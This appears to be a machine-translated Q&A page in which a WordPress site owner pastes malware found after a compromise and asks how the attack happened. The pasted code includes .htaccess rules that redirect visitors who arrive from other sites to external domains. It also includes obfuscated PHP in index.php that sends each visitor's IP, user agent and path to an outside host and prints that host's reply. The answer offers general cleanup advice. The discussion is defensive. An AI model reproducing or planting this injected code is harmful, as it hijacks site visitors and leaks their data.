防止恶意软件攻击我的网站

时间:2013-05-16 16:29:23

标签: php wordpress security malware

我为客户建立了一个wordpress网站。几天后,客户报告该网站已被Google阻止用于恶意软件内容。当我查看网站时,我发现代码中有一些变化,例如.htaccess有这个代码而不是前一个代码。     

 RewriteEngine On

 RewriteBase /

 RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

 RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

 RewriteRule ^.*$ http://clubatleticoestrada.org.ar/awas.html?h=1110720 [L,R]

</IfModule>



<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://halisahamiz.com/eehs.html?h=1110720 [L,R]
</IfModule>


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://zabetonom.ru/mhos.html [L,R]
</IfModule>


RewriteEngine On

RewriteBase / 



# MCCL



# END MCCL

和index.php有这个:

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
     curl_close($stCurlHandle); 
}
}

这次攻击是如何发生的?如何在此次袭击中阻止自己?

在重置网站时,我发现公共Html文件夹之外的一些文件受到了影响。现在有人管理这个吗?

1 个答案:

答案 0 :(得分:2)

整个大型图书馆不足以解释如何执行“黑客攻击”。攻击网站有很多方法和工具。除了SQL injectioncross scripts和密码窃取之外,专业人士也使用复杂的工具。 如果我了解发生了什么,他们已经重定向了您的网站。 我只建议确保您的服务器上有最新的软件更新,请使用this之类的“检查工具”或Acunetix来检查您的网站。黑客也会这样做,以找到易受攻击的网站。 如果您认为重新加载备份可以解决问题,您可能会遇到意外。黑客用来下载后门,他们会回到你的网站。因此更改密码可能无效。我建议你在清理时要非常小心。如果他们的任何其他网站被攻击在同一台服务器上,也请询问您的提供商。在这种情况下,您可以确定服务器上有后门(shell)。在这种情况下,不是您的问题,但提供商有责任整理漏洞并清理服务器。这是最常见的情况。 以上所有内容只是为了粗略地了解问题的复杂性,我完全同意Adrien的观点,即本主题适用于互联网安全论坛。

相关问题